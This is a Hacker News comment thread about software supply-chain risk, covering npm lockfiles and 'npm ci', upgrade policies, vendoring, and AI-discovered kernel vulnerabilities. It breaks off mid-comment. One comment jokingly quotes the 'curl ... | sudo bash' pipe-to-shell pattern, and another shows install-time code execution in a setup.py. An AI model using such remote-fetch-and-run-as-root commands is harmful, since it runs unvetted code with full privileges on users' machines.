Maybe you shouldn't install new software for a bit

xeiaso.net

825 points by psxuaw a day ago · 468 comments

marcus_holmes a day ago

This was always a nightmare waiting to happen. The sheer mass of packages and the consequent vast attack surface for supply chain attacks was always a problem that was eventually going to blow up in everyone's face.

But it was too convenient. Anyone warning about it or trying to limit the damage was shouted down by people who had no experience of any other way of doing things. "import antigravity" is just too easy to do without.

Well, now we're reaching the "find out" part of the process I guess.

  • YZF a day ago

    I worked for one company where we were super conservative. Every external component was versioned. Nothing was updated without review, and usually only after it had plenty of soak time. Pretty much everything was built from source code (compilers, kernel, etc.). Builds [build servers/infra] can't reach the Internet at all and there's a process around getting any change in. We reviewed all relevant CVEs as they came out to make a call on whether they applied to us and how we'd mitigate or address them.

    Then I moved to another company where we had builds that access the Internet. We upgrade things as soon as they come out. And people think this is good practice because we're getting the latest bug fixes. CVEs are reviewed by a security team.

    Then a startup with a mix of other practices. Some very good. But we also had a big CVE debt. E.g. we had secure boot on our servers and encrypted drives. We had a pretty good grasp on securing components talking to each other, etc.

    Everyone seems to think they are doing the right thing. It's impossible to convince the "frequent upgrader" that maybe that's a risk in terms of introducing new issues. We as an industry could really use a better set of practices. Company #1's approach is, for me, the better one in terms of dependency management. In general, company #1 had well-established security practices and we had really secure products.

    • whilenot-dev a day ago

      You forgot case #4: Worked at a startup where the frontend team thought it was a good idea to use lock files during development, but to do a "fresh" install of all dependencies during the deployment step.

      And yes, they still thought they were doing the right thing.

      • hennell a day ago

        To be fair, npm makes (made?) it weirdly hard to use lock files, so a lot of people did that by mistake. And when you do use a lock file, it reinstalls every time, so a retagged package can just silently update.

        • dgoldstein0 19 hours ago

          This was true in very old npm, where generating the lock file was a separate command (npm shrinkwrap), and many people didn't know they should check the shrinkwrap file in. But I think the default flipped before 2020: npm now always creates a package-lock.json (unless an npm-shrinkwrap.json is present, in which case it uses/updates that).
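
          For concreteness, a minimal sketch of the modern npm workflow (package name hypothetical):

              # resolves version ranges and creates/updates package-lock.json
              npm install some-dependency

              # CI-oriented: installs exactly what package-lock.json records, wipes
              # node_modules first, and fails if the lockfile and package.json disagree
              npm ci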

        • whilenot-dev a day ago

          FYI a retagged package would result in a different SHA512 integrity sum and fail the installation process. It won't "just silently update".
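
          For reference, a package-lock.json entry pins that hash alongside the resolved tarball URL; a sketch of one entry (integrity hash elided):

              "node_modules/left-pad": {
                "version": "1.3.0",
                "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz",
                "integrity": "sha512-…"
              }

          npm recomputes the SHA-512 of the downloaded tarball and aborts the install on a mismatch, which is why a retagged release can't slip through silently.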

          Anyway, the point of parent and me wasn't that it was considered to be a "mistake", but people thinking they "are doing the right thing".

        • throawayonthe a day ago

          Doesn't `npm ci` prevent that? It fails if something doesn't match the lockfile, and wipes node_modules before running.

          This is on some ancient Node 16 build I was trying to clean up CI for, so not very recent npm.

          • noirscape a day ago

            npm ci does indeed prevent that. The issue isn't really with npm in specific. Rather, it's with build tools like Microsoft's Oryx, which get pushed in GitHub Actions if you're using Azure App Service. That one by default uses `npm install` on older versions (it's been changed nowadays, but Azure's generated action files have a bad habit of generating with older versions of the actions they're using), even though it's specifically meant for CI usage.

            In general, use of npm ci is usually sparsely documented - most node projects you can find just recommend using npm install during setup, suggesting a failure in promoting its availability (I only know of it because I got frustrated that the lockfile kept clogging up git commits whenever I added dependencies with what looked like auto-generated build-time junk).

        • pseudohadamard 2 hours ago

          Another example of this is Python and its awful externally-managed-environment handling, for which the procedure for anyone who doesn't use Python every day boils down to:

          1. Get instructions from somewhere, a web page, HOWTO, whatever, telling you to "pip install thing".

          2. "× This environment is externally managed"

          3. Spend a while Googling how to get past this and just make the damn thing work, while swearing.

          This is from observing users in practice. Google "This environment is externally managed" and you'll get nothing but hits on (a) people asking what this means and how to make it go away and (b) various unsafe methods to make it so.
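
          For what it's worth, the route that error message is nudging you toward is a virtual environment ("thing" as in the instructions above):

              # create an isolated environment instead of touching the distro's Python
              python3 -m venv .venv
              . .venv/bin/activate
              pip install thing   # installs into .venv, not the system site-packages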

        • user34283 a day ago

          I can’t comment on the behavior of ancient npm versions, but with modern npm I would not even know how to skip using a lockfile.

          As for the parent comment about not using the lockfile for the production build, that’s just incredibly incompetent.

          Maybe they should hire someone who knows what they are doing. Contrary to the popular beliefs of backend engineers online, you also need some competency to do frontend properly.

          In this case what's needed is "npm ci" instead of "npm install", or better, "pnpm install --frozen-lockfile".

          Pnpm will also do that automatically if the CI environment variable is set.

          • cxr 21 hours ago

            > In this case what's needed is "npm ci" instead of "npm install", or better, "pnpm install --frozen-lockfile".

            The grugbrain developer says, "I can use git-add to keep a version controlled copy of the library in my app's source tree with no extra steps after git-clone."

            (Pop quiz: what problem were the creators of NPM's lockfile format trying to solve?)

            • yearolinuxdsktp 20 hours ago

              Lock files were begrudgingly introduced after people who aren't playing around with "move fast and break things" cried foul about dependencies being updated unexpectedly. The "semantic versioning" dogma, and the illusion of safety it brings, was the original motivation. At NPM's creation time, mature dependency management ecosystems did not have floating versions; they were always pinned.

              When you are talking about checking your dependencies in the source tree, you are effectively pinning exact versions, and not using floating/tilde versioning syntax.
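
              A minimal package.json sketch of the difference (package names and versions illustrative):

                  {
                    "dependencies": {
                      "left-pad": "1.3.0",
                      "lodash": "~4.17.20",
                      "express": "^4.18.0"
                    }
                  }

              The first is pinned exactly; the tilde floats across patch releases and the caret across minor releases, which is the floating syntax I mean.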

            • user34283 20 hours ago

              That breaks if the library uses build scripts, like for setting up native binaries, or native modules linked against the specific Node version.

              If you want a vendored deps model you can look at Yarn Plug and Play which does this via .zip files.

              However, I would just stick with regular pnpm installs.

              • cxr 20 hours ago

                > That breaks if the library uses build scripts

                Uh… no.

                > setting up native binaries, or native modules linked against the specific Node version

                So the majority of projects—those that don't use binary NodeJS modules—don't have a reason for sidestepping the primary VCS and going along with npm's shoddily designed overlay version control approach?

                > However, I would just stick with regular pnpm installs.

                You're not answering the question. npm isn't bedrock, and pnpm certainly isn't. If you're going to introduce (mandate) the use of a tool in the workflow, you should be able to justify it by explaining your rationale for introducing it (and making everyone deal with the associated costs). You should at minimum be able to provide a lucid explanation of the tradeoffs. For good measure, you should be able to disprove the "NPM Null Hypothesis"; you should be able to state a straightforward answer to the question, "What problem is this supposed to be solving?"

      • gwerbin 20 hours ago

        This is one of those bizarre "how did you even get that idea" mistakes that ironically replacing developers with AI slop farmers might actually improve on. If you ask Claude to set up a project with NPM and CI, it's not going to do weird shit like that.

        • yearolinuxdsktp 20 hours ago

          I asked Claude to set up a new NPM project and it configured the install task as “npm ci || npm install”, which is stupid. That was on Opus4.7 xhigh. When I pointed out that doing so defeats the purpose, it said “oh yeah of course.”

          Turns out there is no equivalent to "npm ci" that doesn't clear node_modules first, and you can't call npm install to simulate npm ci behavior (sans clean).

    • KGunnerud a day ago

      I would rather work with a company that updates continuously, while also building security into multiple layers so that weaknesses in one layer can be mitigated by others.

      For example, at one company I worked for, they created an ACL model for applications that essentially enforced rules like: "Application X in namespace A can communicate with me." This ACL coordinated multiple technologies working together, including Kubernetes NetworkPolicies, Linkerd manifests with mTLS, and Entra ID application permissions. As a user, it was dead simple to use and abstracted away a lot of things I do not know that well.

      The important part is not the specific implementation, but the mindset behind it.

      An upgrade can both fix existing issues and introduce new ones. However, avoiding upgrades can create just as many problems — if not more — over time.

      At the same time, I would argue that using software backed by a large community is even more important today, since bugs and vulnerabilities are more likely to receive attention, scrutiny, and timely fixes.

      • 12_throw_away 13 hours ago

        > I would rather work with a company that updates continuously, while also building security into multiple layers so that weaknesses in one layer can be mitigated by others.

        Sorry, but if you are updating continuously, then there is at least one layer that you failed to build any security into.

    • bshanks 8 hours ago

      What's the conservative best practice for a solo founder (a one person company; assume the person spends ~20 hours per week on software development/maintenance and the rest of the time on other stuff)?

    • pseudohadamard 2 hours ago

      It's interesting how standards have changed. 25 years ago people screamed about ActiveX despite Microsoft's various attempts to lock it down. Today people use something that pulls a package from a Github repo that was abandoned eight years ago that pulls a package from an FTP server in Denmark that pulls a package from a Raspberry Pi in someone's basement in New Mexico and it's all good practice.

    • dataflow a day ago

      > Everyone seems to think they are doing the right thing

      I like to think people would agree more on the appropriate method if they saw the risk as large enough.

      If you could convince everyone that a nuclear bomb would get dropped on their heads (or a comparably devastating event) if a vulnerability gets in, I highly doubt a company like #2 would still believe they're doing things optimally, for example.

      • KronisLV a day ago

        > if they saw the risk as large enough.

        If you expose people to the true risks instead of allowing them to be ignorant, the conclusion that they might come to is that they shouldn’t develop software at all.

        • dataflow 7 hours ago

          The assumption was obviously that they have a compelling need to develop the software. For the sake of illustration: you imagine exposing them to whatever the highest level of risk is that still makes them willing to develop software.

      • emodendroket a day ago

        Really? You think the alternate mode where you're running 5-year-old versions of stuff with tons of known security flaws is better?

        • coldtea a day ago

          What part of "We reviewed all relevant CVEs as they came out to make a call on if they apply to us or not and how we mitigate or address them" gave you that impression?

        • HeatrayEnjoyer a day ago

          >running 5-year-old versions of stuff with tons of known security flaws

          No one in this thread proposed that, or anything that could be reasonably assumed to have meant that.

    • ndsipa_pomu a day ago

      > It's impossible to convince the "frequent upgrader" that maybe that's a risk in terms of introducing new issues

      I would count myself as a "frequent upgrader" - I admin a bunch of Ubuntu machines and typically set them to auto-update each night (see the config sketch below). I am aware of the risks of introducing new issues, but they're offset by the risks of not upgrading when new bugs are found and patched. There's also the issue of organisations that fall far behind on software versions, which then creates an even bigger problem, though this is more common with Windows/proprietary software as you have less control over it. At least with Linux, you can generally find ways to install e.g. old versions of Java that may be required for specific tools.

      There's no simple one-size-fits-all and it depends on the organisation's pool of skills as to whether it's better to proactively upgrade or to reluctantly upgrade at a slower pace. In my experience, the bugs introduced by new versions of software are easier to fix/workaround than the various issues of old software versions.
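
      On Ubuntu, that nightly auto-update is typically handled by the unattended-upgrades package; a minimal sketch of /etc/apt/apt.conf.d/20auto-upgrades:

          APT::Periodic::Update-Package-Lists "1";
          APT::Periodic::Unattended-Upgrade "1";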

    • JTbane 14 hours ago

      Honestly the de facto standard is to blame: at my dev job, we vacuum up all the packages we need and get the software deployed to production ASAP, then later go over the SBOM and make sure nothing looks sketchy. I'd imagine this is the default most places; an intensive approval process would slow down CI/CD too much.

    • echelon_musk a day ago

      Do you ride an R1?

      • YZF 7 hours ago

        I used to ride a 600R ... yes- that's where my handle comes from ;)

    • shevy-java 19 hours ago

      > It's impossible to convince the "frequent upgrader" that maybe that's a risk in terms of introducing new issues.

      Well, you criticize people who run the latest software here. Two counter-arguments:

      1) If you don't upgrade frequently, you end up with super-stable Debian stuck on ... ancient software. This in turn means that much more recent software won't work unless you recompile a lot. I had this issue with Mesa, for instance, which then needed a more recent LLVM, SPIR-V components and so forth. No chance of having that easily on Debian unless you control what you compile. On my local system here I run GTK2, GTK3 and GTK4 just fine; good luck having that with Debian for recent versions. Even Debian sid is slow compared to, say, Gentoo, Arch or Void here.

      2) Even Debian systems would be vulnerable to copy.fail. So that strategy is also not automatically better.

      Personally I am among the frequent-update folks. I use Ruby scripts to automatically update to the latest, in the hope that the people who write the code are not incompetent. There is no guarantee that newer software is automatically better; it is a trade-off. I don't have the time and resources for infinite security audits. I need to get things done, and this approach, unlike that of the "everything is scary" crowd, works super well for me.

      I use a versioned AppDir approach on Linux, so I don't run into many "can't upgrade because of the same .so name" issues and can conveniently switch to other versions as-is, including the kernel (excluding ABI differences and glibc, but this works very well for about 98% of programs). I am also not alone with the get-everything-working approach, see xserver or gtk2-ng: https://github.com/X11Libre/xserver https://git.devuan.org/Daemonratte/gtk2-ng

      Granted, for the Linux kernel this does not work that well. I think we need better strategies for the kernel; things such as copy.fail should not be possible. I have no good solution here, and AI will find many more exploits. No clue how we can prevent or mitigate this more easily. I was surprised when the local instructor showed us how easy it is to use Python to gain superuser access as-is.

      • YZF 7 hours ago

        Pulling the very latest of everything is IMO risky. What I will acknowledge is that the trade-off between running older versions without knowing the issues in your stack and just pulling the latest all the time is less clear-cut. But running more stable older versions of software while tracking new vulnerabilities seems like it mitigates both the risk of new changes introducing new issues and the risk of a new vulnerability not getting addressed. This worked well for company #1, where we delivered some pretty critical products and the bar was very high for reliability and security.

        A long time ago I heard that Google reviews every single line of third party code they use, not sure if it's true or if they still do it.

      • anthk 18 hours ago

        Debian had backports since forever. You could totally upgrade the kernel and MESA since month 1.

        • tremon 15 hours ago

          Not forever; backports were introduced with Sarge, IIRC. And typically the only versions that appear in backports are those also in testing/unstable, e.g. Linux 6.19 is currently in trixie-backports, but the non-LTS kernels between 6.12 and 6.18 were not available there, nor is the current 7.0 (yet).

  • tclancy a day ago

    So, to play Pandora, what if the net effect of uncovering all these unknown attack vectors is it actually empties the holsters of every national intelligence service around the world? Just an idea I have been playing with. Say it basically cleans up everything and everyone looking for exploits has to start from scratch except “scratch” is now a place where any useful piece of software has been fuzz tested, property tested and formally verified.

    Assuming we survive the gap period where every country chucks what they still have at their worst enemies, I mean. I suppose we can always hit each other with animal bones.

    • xingped a day ago

      TBH this is a pretty good way of looking at it. Yeah we're seeing an explosion of vulnerabilities being found right now, but that (hopefully) means those vulnerabilities are all being cleaned up and we're entering a more hardened era of software. Minus the software packages that are being intentionally put out as exploits, of course. Maybe some might say it's too optimistic and naive, but I think you have a good point.

      • michaelchisari a day ago

        I agree with the prediction but not the timing. We won't enter a more hardened era of software until after a long period of security vulnerabilities.

        Rivers caught on fire for a hundred years before the EPA was formed.

      • FrinkleFrankle a day ago

        New code will also use these tools from the get go, hopefully vastly reducing the vulnerabilities that make it to prod to begin with.

        • gred a day ago

          The future may be distributed quite unevenly here, as they say, with a divergence between a small amount of "responsible" code in systems which leverage AI defensively, and a larger amount of vibe-coded / prompt-engineered code in systems which don't go through the extra trouble, and in fact create additional risk by cutting corners on human review. I personally know a lot of people using AI to create software faster, but none of them have created special security harnesses a la Mozilla (https://arstechnica.com/information-technology/2026/05/mozil...).

      • akoboldfrying a day ago

        > we're entering a more hardened era of software

        This is one force that operates. Another is that, in an effort to avoid depending on such a big attack surface, people are increasingly rolling their own code (with or without AI help) where they might previously have turned to an open source library.

        I think the effect will generally be an increase in vulnerabilities, since the hand-rolled code hasn't had the same amount of time soaking in the real world as the equivalent OS library; there's no reason to assume the average author would magically create fewer bugs than the original OS library authors initially did. But the vulnerabilities will have much narrower scope: If you successfully exploit an OS library, you can hack a large fraction of all the code that uses it, while if you successfully exploit FooCorp's hand-rolled implementation, you can only hack FooCorp. This changes the economic incentive of funding vulnerabilities to exploit -- though less now than in the past, when you couldn't just point an LLM at your target and tell it "plz hack".

        • deepsun a day ago

          If I hand-roll my logging library, I'm unlikely to include an automatic LDAP request based on message text (the infamous Log4j vulnerability).

          • com a day ago

            I’m seeing a lot of similar things during code reviews of substantially LLM-produced codebases now. Half-baked bad ideas that probably leaked from training sets.

            • dboreham 14 hours ago

              It would be very helpful to see even just one example of this syndrome posted so others could become better informed.

          • BigTTYGothGF 21 hours ago

            That particular vulnerability, sure, but there's lots of ways to make mistakes.

        • tclancy 21 hours ago

          While agreeing, it also changes the mathematics of it: if a bad actor wants to hack me specifically, now they have to write custom code that targets my software after figuring out what it _is_. This swaps the asymmetry around: instead of one bad actor writing an exploit for all the world (and those exploits being even harder to find), you have to hate me specifically.

          Admittedly, not hard to do, but it could save some other folks.

          • pixl97 15 hours ago

            Depends on how cheap running LLMs against your software becomes in the future.

        • cratermoon a day ago

          Typically when hand-rolling code you implement only what you require for your use case, while a library will be more general-purpose. As a consequence of doing more, it will have more code and more bugs.

          Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge cases properly.

          For supply chain security and bug count, I'll take a focused custom implementation of specific features over a library full of generalized functionality.

          • jodrellblank 19 hours ago

            leftpad was a focused custom implementation of a specific feature, instead of a library full of generalized functionality. At the time it was pulled, the leftpad code (JavaScript, Node, NPM) was:

                module.exports = leftpad;
                
                function leftpad (str, len, ch) {
                  str = String(str);
                
                  var i = -1;
                
                  ch || (ch = ' ');
                  len = len - str.length;
                
                
                  while (++i < len) {
                    str = ch + str;
                  }
                
                  return str;
                }
            
            A newer version was: https://github.com/left-pad/left-pad/blob/master/index.js which cached common cases and improved on the loop performance, before String.prototype.padStart() became a thing https://www.npmjs.com/package/string.prototype.padstart

            Both old and new versions return a string longer than `len` if the padding char is multiple characters, e.g. leftpad('a', 3, '&&&&') will be longer than 3. That feels like it shouldn't happen.

            • anthk 18 hours ago

              That's almost literally the first exercise with strings you'll learn from "The C Programming Language", 2nd ed. One of the most trivial cases, alongside writing a word/space/tab counting program (wc under Unix).

            • cratermoon 18 hours ago

              I realize I may have made it seem like I was saying leftpad was a general-purpose library. My aside about it was to note that even widely used libraries can still have bugs. That’s orthogonal to their scope.

          • akoboldfrying a day ago

            Yes, a lot hinges on how little you can get away with implementing for your use case. If you have an XML config file with 3 settings in it, you probably won't need to implement handling of external entities the way a full XML parsing library would, which will close off an entire class of attendant vulnerabilities.

            > Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge cases properly.

            This isn't really an argument in favour of having the average programmer reimplement stuff, though. For it to be, you'd have to argue that the leftpad author was unusually sloppy. That may be true in this specific case, but in general, I'm not persuaded that the average OSS author is worse than the average programmer overall. IMHO, contributing your work to an OSS ecosystem is already a mild signal of competence.

            On the wider topic of reimplementation: Recently there was an article here about how the latest Ubuntu includes a bunch of coreutils binaries that have been rewritten in Rust. It turns out that, while this presumably reduced the number of memory corruption bugs (there was still one, somehow; I didn't dig into it), it introduced a bunch of new vulnerabilities, mostly caused by creating race conditions between checking a filesystem path and using the path for something.

            • spockz a day ago

              This argument goes even further. If you have only 3 settings, why does it need to be an xml file?

              • akoboldfrying a day ago

                ETA: I'm not saying it has to, I'm saying it's possible to imagine reasons that would justify this decision in some cases.

                Because it might grow in future and you want to allow flexibility for that; because it might be the input to or output from some external system that requires XML; because your team might have standardised on always using XML config files; because introducing yet another custom plain-text file format just creates unnecessary cognitive load for everyone who has to use it. Those are all real-world reasons I can think of.

                But really I was just looking for a concrete example where I know the complexity of the implementation has definitely caused vulnerabilities, whether or not the choice to use it to solve the problem at hand was sensible. I have zero love for XML.

            • cratermoon 17 hours ago

              I’m not aware of any memory corruption bugs, but there were some weird cases where Linux, stuck with legacy 8-bit character handling for filenames and paths, led to undesirable behavior with Rust’s native Unicode strings.

              The race conditions were indeed TOCTOU bugs. In a sense, the bugs were a result of incorrectly handling shared mutable data, though in this case the mutations were external to Rust.

              https://corrode.dev/blog/bugs-rust-wont-catch/

        • charcircuit a day ago

          >there's no reason to assume the average author would magically create fewer bugs than the original OS library authors initially did

            Have you read this old code? It's terrible, written with no care at all for security, and often in C. AI is much, much better at writing code.

          • akoboldfrying a day ago

            Do you have a specific library in mind? I think it would have to be an ancient, unmaintained C library.

            But I think most OSS code isn't like this -- even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel, GNU userland, PostgreSQL, Python.

            • bigiain a day ago

              > even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel

              There have been two LPE vulnerabilities and exploits in the Linux kernel announced today, after the one announced just last week. I don't think as much of the C code born long ago has been as carefully hardened as you think.

              (Copy Fail 2 and Dirty Frag today, and Copy Fail last week)

              • seba_dos1 a day ago

                One. "Copy Fail 2" and "Dirty Frag" are the same thing.

                • bigiain 4 hours ago

                  Are you sure? I'd really like that to be true, I felt bad finishing up work on Friday evening having applied the Dirty Frag mitigation to all our instances, but knowing (thinking?) the Copy Fail 2 vulnerability was still exploitable.

                  • seba_dos1 41 minutes ago

                    Technically there are two things that need to be fixed in the kernel indeed (and one of them was fixed already), but they're both under the "Dirty Frag" umbrella and the proposed mitigation to not allow the affected modules to load applies to them both.

                • Brian_K_White a day ago

                  And considering the size of the kernel, I call this stupendously good.

                  You (anyone, not you personally) write that much code yourself and let's see how well you did in comparison.

                  • pixl97 15 hours ago

                    But that's the attacker advantage. You can do things right a billion times and one mistake will still take you down.

              • akoboldfrying a day ago

                Sure, I didn't mean to say that these examples are guaranteed 100% safe -- just that I trust them to be enormously more safe than software that accomplishes the same task but was hand-written by either a human or an LLM last week.

      • anankaie a day ago

        To be fair, to some extent that’s up to us. Time to get cleaning, I guess.

      • larodi a day ago

        Are you intentionally avoiding saying ‘thanks to LLMs’, or is it implicit? All these recent mega bugs surface with lots of fuzzing and agentic bashing, right?

        • jangxx a day ago

          Thank you for reminding us all that you AI bros are still the most obnoxious people there are.

          • larodi 17 hours ago

            Indeed, yet more proof that there's a part of the HN crowd which is passive-aggressive, dismissive, and dishonest in the most scientific sense possible. It won't make my day harder than it is, but it is a very weak signal.

            If I'm to be offended by a single thing in your post, it's the name-calling: "AI bro". That was undeserved, and cannot be farther from the truth. Not to mention that your comment is entirely off topic; perhaps you see AI bros everywhere now.

            • 12_throw_away 13 hours ago

              This seems like a very emotional response, which is off-topic for HN. Consider using facts and logic to make calm, rational arguments.

    • jpollock a day ago

      Faults are injected into the code at a constant rate per developer. Then there's the intentional injections.

      Auto-installing random software is the problem. It was a problem when our parents did it, why would it be a good idea for developers to do it?

      • rounce a day ago

        This is related to a massive annoyance of mine: when I run a piece of software and the system is missing a required dependency, I want the software to *tell me* that dependency is missing so I can make a decision about proceeding or not. Instead it seems that far too often software authors will try and be “clever” by silently installing a bunch of dependencies, either in some directory path specific to the software, or even worse globally.

        I run a distro that often causes software like this to break because their silent automatic installation typically makes assumptions about Linux systems which don’t apply to mine. However I fear for the many users of most typical distros (and other OS’ in general as it’s not just a Linux-only issue) who are subject to having all sorts of stuff foisted onto their system with little to no opportunity to easily decide what is being heaped upon them.

        • skydhash a day ago

          Ruby gems and CPAN have build scripts that rebuild stuff on the user's device (and warn you if they can't find a dependency). But I believe it was one of Python's tools that started the trend of downloading binaries instead of building them. Or was it NPM?

          • Izkata 10 hours ago

            Python's pip predates npm, installs dependencies automatically, can include binaries, and the old-style packages could run arbitrary code during the install.

            Ruby gems are older than that, but I have no idea what capabilities it has/had.
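
            To illustrate the arbitrary-code point: a legacy setup.py is ordinary Python that pip executed at install time, so anything at module level ran with the installing user's privileges (contents illustrative):

                # setup.py (legacy sdist), executed by pip during installation
                from setuptools import setup
                import os

                # module-level code runs at install time, before setup() is even called
                os.system("echo this could be anything, running as the installing user")

                setup(name="example-package", version="0.0.1")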

      • i_think_so 15 hours ago

        Is it really a constant rate? Or is it a Law of Large Numbers kind of thing, where past a certain scale the randomness gets smoothed out and looks constant? Or something else?

        (Obviously some developers are better or worse than others, so I presume your observation is assuming developer skill as a constant.)

        • jpollock 2 hours ago

          Well, I think there are two things at play here.

          1) As org size grows, it's the team's average quality that matters (so yes, large numbers).

          2) Even with a single team, the velocity will increase to match the acceptable level of quality.

          Management will push the accelerator until they get too many bugs, then it will be "we need fewer outages".

          So, in a team+environment, you end up with a constant (in time) detection rate, which basically means a constant (in time) injection rate.

          If the teams' velocity increases without increasing quality, the bug injection rate (and detection rate) will increase.

          AKA if the AI is slightly worse, but 10x faster, stop carrying the pager. :)

      • teiferer a day ago

        curl ... | sudo bash

        yolo!

    • allthetime a day ago

      New software is being generated faster than it can be adequately tested. We are in the same place we've always been, except everything is moving much too fast.

      • repelsteeltje a day ago

        This is exactly the feeling I have. First: excessive growth of dependencies fueled by free components.

        * with internet access to FOSS via sourceforge and github we got an abundance of building blocks

        * with central repositories like CPAN, npm, pip, cargo and docker those building blocks became trivially easy to use

        Then LLMs and agents added velocity to building apps and producing yet more components, feeding back into the dependency chain. Worse: new code with unattributed reuse of questionable patterns found in unknowable versions of existing libraries. That is, implicit dependencies on fragments of a multitude of packages.

        This may all end well ultimately, but we're definitely in for a bumpy ride.

      • ClikeX 13 hours ago

        I'm somehow reminded of Wile E. Coyote running off a ledge, staying afloat until he realizes there is no more ground under his feet.

    • bulbar a day ago

      I think it will be an arms race in the future as well. It's easier to fix known vulnerabilities automatically, but also easier to find new ones, and you get the occasional AI fuckup instead of the occasional human fuckup.

      • bigiain a day ago

        Yeah.

        Right now it kinda feels to me like "Open Source" is the Russian army, relying on their sheer numbers and their huge quantity of equipment, much of which is decades old.

        Meanwhile attackers and bug hunters are like the Ukrainians, using new, inexpensive, and surprisingly powerful tools that none of the Open Source community has ever seen in the past, and for which it has very little defence capability.

        The attackers with cheap drones or LLMs are completely overwhelming the old school, who perhaps didn't notice how quickly the world has changed around them, or did notice but cannot do anything about it quickly enough.

        • Brian_K_White a day ago

          Well this argument was certainly inventive. What a weird impression to have about these things.

          Who exactly is the innocent little Ukraine supposed to be that the big bad open source is supposed to be attacking to, what? Take their land and make the OSS leader look powerful and successful at achieving goals to distract from their fundamental awfulness? And who are the North Korean cannon fodder purchased by OSS while we're at it?

          Yeah it's just like that, practically the same situation. The authors of gnu cp and ls can't wait to get, idk, something apparently, out of the war they started when they attacked, idk, someone apparently.

          • bigiain 4 hours ago

            I guess I should have realised that comment could be so easily interpreted in ways I hadn't intended - given the political nature of that war.

            I wasn't intending to pass judgement on which side is the "innocent little" and which is the "big bad", but I (and the downvoters) clearly see that it obviously reads one specific way.

            I wish I'd chosen a less contentious example of an unarguably good army that's 50 or 100 years old and is still using tactics and equipment from the 70s and earlier, fighting against a somewhat less clearly "good" army using new tools that barely existed 5 years ago and new tactics that the older army (and everybody else) has never seen before, with the capability to create new weapons and adjust tactics at speeds previously thought impossible. But that war doesn't exist (at least not outside of blindly loyal Russia supporters).

            For the record, I believe Russia is clearly on the side of evil and Ukraine is clearly on the side of good in this conflict.

            • bulbar 24 minutes ago

              The problem with the metaphor is that you switched the attacker and defender role.

              Russia is the aggressor, but in your metaphor they are the defenders.

    • marcus_holmes a day ago

      This assumes that there are no new exploits being generated.

      We're seeing maintainers retreat from maintaining because the amount of AI slop being pushed at them is too much. How many are just going to hand over the maintenance burden to someone else, and how many of those new maintainers are going to be evil?

      The essential problem is that our entire system of developing civilisation-critical software depends on the goodwill of a limited set of people to work for free and publish their work for everyone else to use. This was never sustainable, or even sensible, but because it was easy we based everything on it.

      We need to solve the underlying problem: how to sustainably develop and maintain the software we need.

      A large part of this is going to have to be: companies that use software to generate profits paying part of those profits towards the development and maintenance of that software. It just can't work any other way. How we do this is an open question that I have no answers for.

      • teiferer a day ago

        That is already how it works. The lone hacker in mom's basement working for free on his super-critical OSS package is largely a myth. The vast majority of OSS code is contributed by companies paying their employees to work on it.

        • marcus_holmes a day ago

          I'm thinking of projects like curl [0].

          It is a cornerstone of modern software development. If it died, or if it got taken over by a malicious entity, every single company on the planet would have an immediate security problem. Yet the experience of that maintainer is bad verging on terrible [1].

          We need to do better than this.

          [0] https://curl.se/docs/governance.html

          [1] https://lwn.net/Articles/1034966/

          • duskdozer a day ago

            >As an example, he put up a slide listing the 47 car brands that use curl in their products; he followed it with a slide listing the brands that contribute to curl. The second slide, needless to say, was empty.

            >He emphasized that he has released curl under a free license, so there is no legal problem with what these companies are doing. But, he suggested, these companies might want to think a bit more about the future of the software they depend on.

            There is little reason for minimal-restriction licenses to exist other than to allow corporate use without compensation or contribution. I would think that, by now, any hope that these companies would voluntarily be less exploitative than they could be has been dashed.

            If you aren't getting paid or working purely for your own benefit, use a protective license. Though, if thinly veiled license violation via LLM is allowed to stand, this won't be enough.

            • marcus_holmes a day ago

              There is a lot of opposition in the FOSS community to restrictive/protective licenses. And to be fair, this comes from a consistent and entirely logical worldview.

              There's a bunch of problems with getting companies to pay for this, too - that sense of entitlement (or even contractual obligation), the ability to control the project with cash, etc.

              I don't have any answers or solutions. But I don't think we can hand-wave the problem away.

              • uecker a day ago

                The problem is that they get away too easily with bugs in the products they ship to customers. If this came with some penalties, there would be an incentive to invest in security, and that investment would probably often flow back to upstream projects.

                • marcus_holmes 21 hours ago

                  Seriously? You think that curl gets away with bugs shipping to prod? And that's the major problem?

                  I don't agree with any of that.

                  • uecker 17 hours ago

                    I was not talking about curl, but about the downstream products such as cars. And I am sure curl would appreciate support from car vendors; that was the point, wasn't it?

                • teytra a day ago

                  Like a money-back guarantee?

                  Like you get when you buy e.g. MS products?

                  /s

                  • uecker a day ago

                    I am not talking about the open-source projects, but the downstream products such as cars that integrate curl.

        • larodi a day ago

          The sad truth about open source in 2026 is that it does not serve society the way it is advertised, or the way it did back in the 90s.

          • spockz a day ago

            How so? We have open source operating systems running on a whole slew of systems ages apart, with interesting ideas and open collaboration coming out of the open-source world.

            This as opposed to closed-off "products" that change at the whims of the company owning them.

            • larodi a day ago

              Statistically, most of it is created to serve marketing, personal, or other agendas, and is sponsored through the corresponding means.

              There's a lot of misconception about how open source comes to be; only a small part of it, still significant of course, was really created for the benefit of a community. There are exceptions, but dig into the organisational culture and origins and you'll see the pattern. Also, thousands of projects are made purely for the satisfaction of the author himself, being highly intelligent and high on algorithmic dopamine.

      • mastermage a day ago

        There is an xkcd about that, I think.

    • mahart a day ago

      Having casually read into a few recent incidents, the vector has often been outside of the software itself: a lot of misconfigurations, or simply attacking the human in the chain. And nation states have basically unbounded resources for everything from bribes and insiders to standing up entire companies.

    • dml2135 15 hours ago

      Here's a crazy idea -- what if some of these vulnerabilities are surfacing because they have actually been found, already, and exist in the training data?

      Even an intelligence agency doesn't have perfect opsec, and something could get mentioned offhand somewhere on a forum, but never get picked up until the LLM uses it.

    • Barbing a day ago

      Will need those animal bones if all the industrial control systems get turned against us

      Nuclear might be airgapped but what about water, power…?

    • teiferer a day ago

      What we are seeing come out of the AI agent era so far is reduced, not increased, code quality. The few advances are by far negated by all the slop that's thrown around, and that's unlikely to change.

      > any useful piece of software has been fuzz tested, property tested and formally verified.

      That would require effort. Human effort and extra token cost. Not going to happen; people would rather move fast and break things.

      • Hfuffzehn a day ago

        Isn't blaming AI for that similar to blaming C for buffer overflows?

        More people are producing more code because of easier tools. Most code is bad. But that's not the tools' fault.

        And in the end it is a problem of processes and culture.

        • teiferer a day ago

